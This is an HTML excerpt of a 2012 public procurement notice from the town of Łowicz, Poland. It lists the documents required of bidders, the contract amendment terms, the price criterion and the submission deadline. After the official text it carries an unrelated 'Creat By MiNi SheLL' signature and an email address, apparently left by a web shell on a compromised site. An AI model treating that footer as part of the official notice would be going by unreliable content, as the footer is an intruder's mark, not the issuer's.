<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie  zmiany  niniejszej  umowy  mogą  nastąpić jedynie  w   formie   pisemnej   pod 	rygorem nieważności.
2.	Zmiana postanowień niniejszej umowy może nastąpić jedynie w razie zaistnienia 	następujących okoliczności:
1)	klęski żywiołowe,
2)	inne warunki atmosferyczne odbiegające od typowych, uniemożliwiające wykonywanie przedmiotu niniejszej umowy,
3)	inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością wykonywania przedmiotu niniejszej umowy                            lub wykonywania czynności przewidzianych niniejszą umową, 
3.	W przypadkach, o których mowa w ust. 2:
1)	Wykonawca nie ponosi odpowiedzialności za szkody wynikające z opóźnienia                       lub niewykonania jego zobowiązań wynikających z niniejszej umowy,
2)	Wykonawca zobowiązany będzie prowadzić te czynności, których realizacja                        nie  podlega  ograniczeniom  wynikającym  z  przypadków,  o  których mowa w ust. 2,  
	chyba że Zamawiający uzna, iż prawdopodobne jest tylko częściowe wykonanie 	czynności, które będą dla niego nieprzydatne,
3)	Wykonawca zobowiązany jest uzgodnić z Zamawiającym, czy i jakie alternatywne środki są możliwe do zastosowania w celu prowadzenia czynności objętych niniejszą umową w przypadkach, o których mowa w ust. 2 oraz zobowiązany jest                      do podjęcia działań uzgodnionych w tym zakresie przez obydwie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lowicz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miasta Łowicza -Urząd Miejski w Łowiczu, Wydział Spraw Komunalnych i Reagowania Kryzysowego Urzędu Miejskiego w Łowiczu, Stary Rynek 1, 99 -400 Łowicz, woj. Łódzkie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2012 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Łowiczu, Stary Rynek 1, budynek A, pok. 7..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com